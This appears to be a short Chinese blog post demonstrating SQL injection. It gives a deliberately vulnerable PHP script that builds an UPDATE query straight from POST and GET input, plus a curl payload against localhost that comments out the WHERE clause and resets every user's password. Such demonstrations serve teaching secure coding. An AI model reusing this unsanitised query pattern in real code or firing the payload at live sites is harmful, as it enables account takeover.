模拟一次sql注入攻击
2024-09-07 03:20:57
在你的web服务目录下 创建一个php文件如下
<?php
$conn = db_connect();
$sql = sprintf('update users set password = "%s" where id = %s',
$_POST['password'],
$_GET['id']
);
echo $sql . PHP_EOL;
$result = $conn->query($sql);
if(!$result){
echo 'sql执行出错' . PHP_EOL;
} function db_connect() {
$result = new mysqli('', '', '', '');
if (!$result) {
return false;
}
$result->autocommit(TRUE);
return $result;
} function db_result_to_array($result) {
$res_array = array(); for ($count=0; $row = $result->fetch_assoc(); $count++) {
$res_array[$count] = $row;
} return $res_array;
}
curl模拟 访问传参 post
curl -d "password=123456\";-- " http://localhost:8080/sanitize-validate-escape/sanitize-sql-bad.php?id=1
这样 把 usrs表的所有记录的密码都改为了123456
最新文章
- fiddler手机抓包教程
- angular中ng-model,返回数据,拆分数据,展示,名称相同,重新赋值会有冲突
- CSU 1116 Kingdoms(枚举最小生成树)
- WPF datagrid 动态增加列
- C++复现经典游戏——扫雷
- fork()函数详解
- C#中的ref和out的区别
- Mysql:表的操作
- leetcode problem (5) Longest Palindromic Substring
- 【Android】随时随地退出程序
- html5--canvas学习笔记
- [工作问题总结]MyEclipse 打开项目
- Windows Phone 8初学者开发—第12部分:改进视图模型和示例数据
- CF 319C(Kalila and Dimna in the Logging Industry-斜率DP,注意叉积LL溢出)
- iOS8:把这些七招APP哭
- Orchard Logging
- 第八节: Quartz.Net五大构件之SimpleThreadPool及其四种配置方案
- MyBatis-Plus 3.0.3 Sql注入器添加,即全局配置Sql注入器,sqlInjector改写
- ASP.NET MVC5入门3之登录验证
- fastDFS教程Ⅱ-文件服务器迁移
热门文章
- win10+anaconda安装tensorflow和keras遇到的坑小结
- [转]JSP自定义标签
- [转]利用 Commons-Fileupload 实现文件上传
- nginx 的四层代理
- 【剑指Offer面试编程题】题目1506:求1+2+3+...+n--九度OJ
- Pytorch本人疑问(2)model.train()和model.eval()的区别
- Java源码-集合-ArrayList
- Spring开发踩坑记录
- Linux--如何实现虚拟机与主机之间的文件传输无需第三方,即可轻松设置共享文件夹(适合所有人群)
- A easy and simple way to establish Oracle ADG